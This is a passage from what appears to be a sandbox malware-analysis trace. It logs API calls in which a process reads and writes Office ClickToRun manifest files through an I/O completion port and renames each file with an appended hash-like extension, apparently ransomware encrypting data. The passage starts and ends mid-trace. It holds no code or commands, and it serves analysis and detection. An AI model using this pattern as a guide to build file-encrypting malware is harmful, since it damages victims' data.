0x0 [0156.147] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.148] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.149] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", lpString2=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") 
returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" [0156.149] GetProcessHeap () returned 0x270000 [0156.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19c) returned 0x42460b8 [0156.149] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42460b8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0156.152] CloseHandle (hObject=0x590) returned 1 [0156.155] GetProcessHeap () returned 0x270000 [0156.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.156] RtlInterlockedCompareExchange64 () returned 0x1 [0156.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.160] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.161] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.413] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.414] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.416] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0156.417] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" [0156.417] GetProcessHeap () returned 0x270000 [0156.417] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1bc) returned 0x36c248 [0156.417] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x36c248, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0156.419] CloseHandle (hObject=0x590) returned 1 [0156.420] GetProcessHeap () returned 0x270000 [0156.422] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.424] RtlInterlockedCompareExchange64 () returned 0x1 [0156.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.429] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.429] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.430] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.431] RtlInterlockedCompareExchange64 () returned 0x0 [0156.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.432] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0156.433] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" 
[0156.433] GetProcessHeap () returned 0x270000 [0156.433] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c8) returned 0x4330138 [0156.433] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x4330138, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0156.436] CloseHandle (hObject=0x590) returned 1 [0156.440] GetProcessHeap () returned 0x270000 [0156.442] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.443] RtlInterlockedCompareExchange64 () returned 0x1 [0156.443] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.447] ReadFile (in: hFile=0x5ac, lpBuffer=0x7600180, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.448] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.449] WriteFile (in: hFile=0x5ac, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.450] RtlInterlockedCompareExchange64 () returned 0x0 [0156.450] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.451] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, 
ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.452] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" [0156.452] GetProcessHeap () returned 0x270000 [0156.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278358 [0156.452] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x4278358, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.480] CloseHandle (hObject=0x5ac) returned 1 [0156.483] GetProcessHeap () returned 0x270000 [0156.486] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.486] RtlInterlockedCompareExchange64 () returned 0x1 [0156.486] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.488] WriteFile (in: hFile=0x5a8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.489] RtlInterlockedCompareExchange64 () returned 
0x1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.498] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.499] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" [0156.499] GetProcessHeap () returned 0x270000 [0156.499] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x42786c8 [0156.499] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x723f8dc, FileInformation=0x42786c8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.501] CloseHandle (hObject=0x5a8) returned 1 [0156.505] GetProcessHeap () returned 0x270000 [0156.506] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.512] RtlInterlockedCompareExchange64 () returned 0x1 [0156.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.514] WriteFile (in: hFile=0x5a0, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.515] RtlInterlockedCompareExchange64 () returned 0x1 [0156.515] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.524] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0156.525] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", lpString2=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" [0156.525] GetProcessHeap () returned 0x270000 [0156.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x36c410 [0156.525] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c410, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.527] CloseHandle (hObject=0x5a0) returned 1 [0156.530] GetProcessHeap () returned 0x270000 
[0156.531] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.532] RtlInterlockedCompareExchange64 () returned 0x1 [0156.532] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.534] ReadFile (in: hFile=0x598, lpBuffer=0x750a298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160) returned 1 [0156.534] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.535] WriteFile (in: hFile=0x598, lpBuffer=0x750a298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160) returned 1 [0156.536] RtlInterlockedCompareExchange64 () returned 0x0 [0156.536] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.537] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74ea210, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74ea210, ReturnLength=0x723f8ec) returned 0x0 [0156.538] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", 
lpString2=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" [0156.538] GetProcessHeap () returned 0x270000 [0156.539] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c4) returned 0x4330310 [0156.539] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4330310, Length=0x1c4, FileInformationClass=0xa) returned 0x0 [0156.541] CloseHandle (hObject=0x598) returned 1 [0156.546] GetProcessHeap () returned 0x270000 [0156.548] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0156.549] RtlInterlockedCompareExchange64 () returned 0x1 [0156.549] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.554] ReadFile (in: hFile=0x598, lpBuffer=0x7600180, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.555] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.555] WriteFile (in: hFile=0x598, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x3600, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.556] RtlInterlockedCompareExchange64 () returned 0x0 [0156.556] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.557] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.558] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", lpString2=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" [0156.558] GetProcessHeap () returned 0x270000 [0156.558] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4278a38 [0156.558] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4278a38, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0156.560] CloseHandle (hObject=0x598) returned 1 [0156.563] GetProcessHeap () returned 0x270000 [0156.564] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.573] RtlInterlockedCompareExchange64 () returned 0x1 [0156.573] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.578] ReadFile (in: hFile=0x598, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.579] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.579] WriteFile (in: hFile=0x598, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.580] RtlInterlockedCompareExchange64 () returned 0x0 [0156.580] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.581] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.582] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" [0156.582] GetProcessHeap () returned 0x270000 [0156.582] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc830 [0156.582] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fc830, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.584] CloseHandle (hObject=0x598) returned 1 [0156.602] GetProcessHeap () returned 0x270000 [0156.603] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.603] RtlInterlockedCompareExchange64 () returned 0x1 [0156.603] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.606] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.608] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: 
